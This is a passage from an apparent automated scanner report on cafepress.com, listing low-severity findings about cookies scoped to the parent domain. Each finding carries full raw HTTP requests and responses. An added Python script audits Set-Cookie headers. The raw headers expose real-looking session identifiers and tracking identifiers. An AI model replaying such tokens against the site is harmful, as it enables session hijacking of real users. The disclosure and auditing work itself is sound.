Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
Set-Cookie: cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 95181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
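The check behind issues 2.4 through 2.13, written out as an added Python example (this is not code from the XSS.CX report or from the scanner that produced it): it parses each Set-Cookie header in a raw response, tests whether the Domain attribute names a proper parent of the issuing host, records the HttpOnly and Secure flags, and applies a session-token heuristic. The cookie-name list and the value check in that heuristic are my own assumptions and are broader than whatever rule produced the report's highlighting. The embedded headers are copied from the 2.4 response above (trimmed to a few cookies); the host name and everything else is constructed for the demonstration. One practical caveat the data itself shows: 2.4 sets ASP.NET_SessionId with HttpOnly, but the reissues from 2.5 onward omit the flag, so this kind of audit has to run on every response rather than once per host.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Cookie names that conventionally carry a session token. Assumption: this is a
# heuristic list of my own, not something the report defines.
SESSION_COOKIE_NAMES = {"asp.net_sessionid", "phpsessid", "jsessionid", "sessionid", "session", "sid"}


@dataclass
class CookieFinding:
    name: str
    domain: Optional[str]
    scoped_to_parent: bool   # Domain attribute names a parent of the issuing host
    httponly: bool
    secure: bool
    looks_like_session: bool


def parse_set_cookie(header_value: str) -> Tuple[str, str, Dict[str, str]]:
    """Split one Set-Cookie value into (name, value, {attribute: value}).

    Attribute names are lower-cased; flag attributes such as HttpOnly map to "".
    Expires values contain commas but never semicolons, so splitting on ";" is safe.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def is_parent_domain(host: str, domain: str) -> bool:
    """True when `domain` is a proper parent of `host` (RFC 6265 domain-match, host itself excluded).

    A cookie with Domain=cafepress.com issued by www.cafepress.com is sent to every
    cafepress.com subdomain, which is what the report flags.
    """
    host = host.lower().rstrip(".")
    domain = domain.lower().lstrip(".").rstrip(".")
    return domain != host and host.endswith("." + domain)


def looks_like_session_token(name: str, value: str) -> bool:
    """Name-based match first, then a crude value check (>= 20 alphanumerics mixing letters and digits)."""
    if name.lower() in SESSION_COOKIE_NAMES:
        return True
    return bool(
        len(value) >= 20
        and re.fullmatch(r"[A-Za-z0-9]+", value)
        and re.search(r"[0-9]", value)
        and re.search(r"[A-Za-z]", value)
    )


def audit_response(host: str, raw_headers: str) -> List[CookieFinding]:
    """Evaluate every Set-Cookie header in a raw HTTP response head issued by `host`."""
    findings: List[CookieFinding] = []
    for line in raw_headers.splitlines():
        if not line.lower().startswith("set-cookie:"):
            continue
        name, value, attrs = parse_set_cookie(line.split(":", 1)[1])
        domain = attrs.get("domain")
        findings.append(CookieFinding(
            name=name,
            domain=domain,
            scoped_to_parent=bool(domain) and is_parent_domain(host, domain),
            httponly="httponly" in attrs,
            secure="secure" in attrs,
            looks_like_session=looks_like_session_token(name, value),
        ))
    return findings


def risky(findings: List[CookieFinding]) -> List[CookieFinding]:
    """Session-like cookies scoped to a parent domain that lack HttpOnly or Secure."""
    return [f for f in findings
            if f.looks_like_session and f.scoped_to_parent and not (f.httponly and f.secure)]


# Headers copied from the issue 2.4 response above (issuing host www.cafepress.com),
# trimmed to the cookies needed for the demonstration.
SAMPLE_HOST = "www.cafepress.com"
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly
Set-Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
Set-Cookie: cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Cache-Control: private
"""

if __name__ == "__main__":
    for f in audit_response(SAMPLE_HOST, SAMPLE_HEADERS):
        print(f"{f.name:20} domain={f.domain!s:16} parent={f.scoped_to_parent} "
              f"httponly={f.httponly} secure={f.secure} session={f.looks_like_session}")
```

On the 2.4 headers every cookie comes back as parent-scoped, and `risky()` returns ASP.NET_SessionId (HttpOnly but not Secure) together with cp-v, which the value heuristic picks up because its 32-character hex value looks token-like; whether cp-v really is a session identifier is exactly the "review the contents of the cookies" step the report leaves to the reader.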
2.5. http://www.cafepress.com/+aprons
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+aprons
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. Note that this reissue of ASP.NET_SessionId carries no HttpOnly flag, unlike the one recorded in issue 2.4. You should review the contents of the cookies to determine their function.
Request
GET /+aprons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 60330
Date: Sun, 26 Dec 2010 13:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.6. http://www.cafepress.com/+baby-blanket
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+baby-blanket
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+baby-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 58677
Date: Sun, 26 Dec 2010 13:46:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/
Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.7. http://www.cafepress.com/+baby-bodysuits
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+baby-bodysuits
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+baby-bodysuits HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 59167
Date: Sun, 26 Dec 2010 13:46:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.8. http://www.cafepress.com/+baby-hat
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+baby-hat
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+baby-hat HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 58517
Date: Sun, 26 Dec 2010 13:46:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.9. http://www.cafepress.com/+bags
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+bags
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+bags HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59533
Date: Sun, 26 Dec 2010 13:46:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.10. http://www.cafepress.com/+boxers
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+boxers
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+boxers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
